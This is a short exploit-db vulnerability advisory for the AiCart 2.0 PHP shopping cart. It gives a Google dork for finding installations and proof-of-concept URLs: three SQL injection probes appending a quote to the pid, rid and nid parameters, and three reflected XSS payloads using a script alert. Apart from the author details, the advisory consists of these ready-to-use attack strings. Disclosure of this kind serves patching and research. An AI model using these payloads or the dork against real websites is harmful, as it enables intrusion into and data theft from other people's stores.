AiCart 2.0 – Multiple Vulnerabilities

  • 作者: takeshix
    日期: 2011-06-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17410/
  • =================================[ AiCart 2.0 Multiple Vulnerabilities ]===================================
    
    == Infos ==================================================================================================
    
    [ Date ]				[ 18.06.2011 ]
    [ Software URL ]			[ http://www.aicart.ca/ ]
    [ Version ]				[ 2.0 ]
    [ Google Dork ]				[ inurl:'/store.php?action=view_product pid=' ]
    [ System ]				[ PHP ]
    [ Testing System ]			[ Fedora ]
    [ Risk Level ]				[ High ]
    [ CVE ]					[ - ]
    
    == Autor Details ==========================================================================================
    
    [ Autor ]				[ takeshix ]
    [ Autor Contact ]			[ takeshix.query@googlemail.com ]
    
    == PoC ====================================================================================================
    
    [ SQLi ]	http://localhost/store.php?action=view_product?pid='
    [ SQLi ]	http://localhost/store.php?rid='
    [ SQLi ]	http://localhost/news.php?nid='&action=view
    
    [ XSS ]		http://localhost/store.php?action=view_product?pid=<script>alert('takeshix')</script>
    [ XSS ]		http://localhost/store.php?rid=<script>alert('takeshix')</script>
    [ Xss ]		http://localhost/news.php?nid=<script>alert('takeshix')</script>&action=view
    
    == Greez ==================================================================================================
    
    [ hackademics ] [ DSU ] [ UNITS ]
    
    =============================================[ hacktivistas ]==============================================